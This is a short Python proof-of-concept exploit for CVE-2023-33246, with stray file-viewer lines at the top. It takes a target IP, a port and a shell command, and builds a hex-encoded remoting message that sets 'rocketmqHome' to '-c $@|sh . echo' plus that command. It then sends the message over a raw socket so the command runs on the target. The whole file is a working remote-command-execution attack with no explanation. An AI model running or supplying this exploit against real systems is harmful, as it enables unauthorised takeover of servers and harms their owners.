31 lines
1.1 KiB
Python
31 lines
1.1 KiB
Python
# CVE-2023-33246
|
|
|
|
import socket
|
|
import sys
|
|
|
|
if len(sys.argv) < 4:
|
|
print('Usage: python3 poc.py <ip> <port> <command>')
|
|
sys.exit(1)
|
|
|
|
|
|
def send_data(ip, port, payload):
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
|
|
s.connect((ip, port))
|
|
s.sendall(payload)
|
|
s.close()
|
|
|
|
|
|
if '__main__' == __name__:
|
|
ip = sys.argv[1]
|
|
port = int(sys.argv[2])
|
|
command = ' '.join(sys.argv[3:]).strip()
|
|
hex_payload_prefix = '000000cd000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f20'
|
|
hex_payload_suffix = '3b0a'
|
|
payload = bytes.fromhex(hex_payload_prefix) + command.encode() + bytes.fromhex(hex_payload_suffix)
|
|
hex_payload_length = hex(len(payload) - 4)[2:]
|
|
payload = payload.hex().replace('000000cd000000', '000000' + hex_payload_length + '000000')
|
|
payload = bytes.fromhex(payload)
|
|
|
|
send_data(ip, port, payload)
|